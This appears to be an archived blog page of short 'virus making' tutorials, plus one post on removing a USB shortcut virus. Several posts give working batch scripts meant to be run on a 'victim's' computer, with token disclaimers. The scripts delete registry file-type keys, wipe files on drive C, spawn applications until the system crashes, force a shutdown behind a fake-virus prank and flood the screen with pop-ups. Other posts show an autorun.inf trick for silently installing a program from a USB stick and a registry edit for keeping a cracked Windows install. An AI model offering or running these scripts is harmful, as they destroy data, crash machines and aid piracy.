Showing posts with label Programming. Show all posts
Showing posts with label Programming. Show all posts

Wednesday, 22 July 2015

Destroy the registry

Make A Virus:-

Destroy the registry


"This is virus is highly risky. There is no recovery after using this..."


You need to write this Program in Notepad.exe

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your message here.
GOTO MESSAGE

SAVE THIS WITH  .bat file and run into Victim's Computer. And That PC is Done For It.

This Information is Knowledge Only!  

Monday, 20 July 2015

This Virus Deletes All the Data From Drive

VIRUS MAKING:

This Virus Deletes All the Data From Drive







Trick:

@Echo off

Del C:\ *.* |y



Save The Above Code a .bat file in Notepad and Run into Victim's Computer 
You Can Replace Drive tag.

I am not responsible for any damage.  it all on Your own risk.

Sunday, 23 November 2014

How to Remove Shortcut Virus From Pendrive

Remove Shortcut Virus From Pendrive


One such frustrating virus is well known ‘shortcut virus’. 


Antivirus software may detect the virus but can’t delete it from USB drive.


When ever the USB affected with shortcut virus,every piece of  data in it is shown as shortcut and Some time it will not be opened.





Now how to recover data and remove the virus:-


Step 1: Open CMD. (start > Run > cmd)

Step 2: now type:- attrib -h -r -s /s /d G:\*.*    
    
    "(G: is my USB drive letter. Replace with your USB letter)"

Step 3: Enter

Now Check your data....and Enjoy!!!!!!!!!!

You're Done!

Saturday, 15 November 2014

how to automatically install program(or a virus) into someone's computer using USB?

How to automatically install program(or a virus) into someone's computer using USB?

 I am gonna show you how to make a autorun.inf.

Steps

1. open a notepad.
 

2.type this codes
 

3.[autorun]
   open=program name.extension

   Action=start my application
 

4.save it as a "autorun.inf"

(if in your program name has a space so replace space with "_".)


Now copy autorun.inf file and a program into pendrive and give it to victim.when victim insert pendrive into system the program(or a virus) will be installed anonymously in victim's system.

"I am not responsible for what you gonna do with this information."

Thursday, 13 November 2014

How to update windows without losing crack

How to Update Windows without losing Crack



1.Launch Regedit.

2.Go down to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion.

3.Look for a value named RegDone. If it isn't there create a new key with this value.
{Value Name: RegDone
Data Type: REG_SZ (String Value)
Value Data: (0 = disabled, 1 = enabled)}

4.Right click the new value and choose Modify. Make the value 1.
 
5.Close Regedit and
 
6.Enjoy!

Wednesday, 12 November 2014

How to Make an Application bomber

How to Make an Application bomber

How to open up many applications continuously using a loop.

 "oops! it will make the system crash immediately."

Write this program in notepad and Save as a ".bat"

@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop

When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots.

"I am not responsible for what you do with this Information"

How to make a fake virus

How To Make a Fake Virus

Fool your friends into thinking that their computer has a virus.


Write the program in notepad


@echo off
title Cyber Attack Sequence Initiation
color 02
echo Warning-Complete File Corruption imminent.
timeout /t 3 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 10
timeout /t 1 /nobreak >nul
ClS
echo Complete file corruption and computer shutdown in 9
timeout /t 1 /nobreak >nul
ClS
echo Complete file corruption and computer shutdown in 8
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 7
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 6
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 5
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 4
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 3
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 2
timeout /t 1 /nobreak >nul
CLS
echo Complete file corruption and computer shutdown in 1
timeout /t 1 /nobreak >nul
CLS
echo File corruption and computer shutdown initiated
timeout /t 3 /nobreak >nul
CLS
echo Corrupting Critical System Files...
echo del* *
timeout /t 2 /nobreak >nul
echo The System cannot find the file specified.
echo:
echo:
echo:
echo:
echo:
echo Corrupting Root Partition...
echo del C:\Windows
timeout /t 2 /nobreak >nul
echo Deletion Successful!
echo:
echo:
echo:
echo:
echo:
echo:
echo:
echo Disabling Windows Firewall...
echo Killing all processes...
timeout /t 2 /nobreak >nul
echo Allowing virus to boot from startup...
timeout /t 2 /nobreak >nul
echo:
echo:
echo:
echo:
echo:
echo Virus has been executed successfully!
echo:
echo:
echo Have Fun!
timeout /t 2 /nobreak >nul
shutdown -s -t 45 /c Your computer has committed suicide. Have a nice day.

save as a ".bat" file

At the end of the program a
message will pop up that says "Your computer has committed suicide.
Good-bye". Then the computer will shutdown. 


Monday, 10 November 2014

continuous pop up messages

Continuous pop-up Messages

Message annoyer is a batch program.
It will interact with the user anyhow annoying and irritating them by popping up some message box containing some
messages in it.

Open Notepad.exe and write this batch program and save it as ".bat".

@echo off
:annoy
msg * Hi there!
msg * How u doin ?
msg * Are you fine ?
msg * Never mind about me....
msg * I am not here to annoy you....
msg * I am caring for you.....
msg * start counting from 1 to 5, i Will be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoy

This program will pops up a small message box as shown below,



Containing the text mentioned in the program given above.
 
This message box will pop up until for endless loop, which really annoys the person sitting before the
computer. Even these small popup windows may crash the computer, if it overloads the memory.

"I am not responsible for what you do with this Information"